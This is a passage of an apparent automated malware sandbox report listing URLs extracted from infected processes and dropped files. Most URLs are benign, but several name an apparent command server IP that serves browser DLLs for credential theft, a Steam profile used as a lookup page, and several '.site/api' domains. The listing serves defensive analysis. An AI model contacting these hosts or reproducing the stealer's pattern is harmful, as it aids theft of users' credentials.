Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: IIJKJDAFHJ.exe, 0000000D.00000002.2315175721.0000000001222000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.c
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2404569531.000000006C17D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000002.00000002.2348492649.000000001A0D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2366768729.000000002007D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2775515172.000000001B738000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2789407246.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.27.dr String found in binary or memory: https://49.12.197.9
Source: RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9.0.5938.132
Source: RegAsm.exe, 0000001B.00000002.2589447441.00000000011EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/(
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/0n
Source: RegAsm.exe, 0000001B.00000002.2589447441.00000000011EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/1
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/1QW
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/4k
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/9
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/B_F
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/EHCAKF
Source: RegAsm.exe, 0000001B.00000002.2589447441.00000000011EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/G
Source: RegAsm.exe, 0000001B.00000002.2589447441.00000000011EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/N
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/e
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/freebl3.dll
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/freebl3.dllK
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/mozglue.dll
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/mozglue.dllg
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/msvcp140.dll
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/msvcp140.dllI
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/nss3.dll
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/softokn3.dll
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/softokn3.dllu
Source: RegAsm.exe, 0000001B.00000002.2585998316.000000000055E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/sqlp.dll
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/sqlp.dll&
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/sqlp.dll(3
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/sqlp.dll5
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/sqlp.dll63
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/vcruntime140.dll
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/vcruntime140.dllS
Source: RegAsm.exe, 0000001B.00000002.2585998316.0000000000563000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9DHIDHDHIss.exe
Source: RegAsm.exe, 0000000C.00000002.2737816539.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9HJEBGI
Source: RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9IDHDBF
Source: RegAsm.exe, 0000001B.00000002.2585998316.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9IDHDHI
Source: RegAsm.exe, 0000001B.00000002.2585998316.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000463000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000584000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000045D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9ta
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2541722970.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abnomalrkmu.site/api
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://abnomalrkmu.site:443/apiPK
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000103F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorptioniw.site/
Source: RegAsm.exe, 0000001C.00000002.2542151523.0000000001333000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorptioniw.site/Mx
Source: RegAsm.exe, 0000001C.00000002.2541722970.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorptioniw.site/api
Source: RegAsm.exe, 0000001C.00000002.2541722970.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorptioniw.site/api.
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorptioniw.site:443/api
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: 76561199780418869[1].htm.27.dr String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2782993650.00000000277AF000.00000004.00000020.00020000.00000000.sdmp, DGCAAFBFBKFIDGDHJDBK.15.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2782993650.00000000277AF000.00000004.00000020.00020000.00000000.sdmp, DGCAAFBFBKFIDGDHJDBK.15.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chorusarorp.site/api
Source: RegAsm.exe, 0000001C.00000002.2541722970.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chorusarorp.site/apiK)l
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.co
Source: RegAsm.exe, 0000001B.00000002.2585998316.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
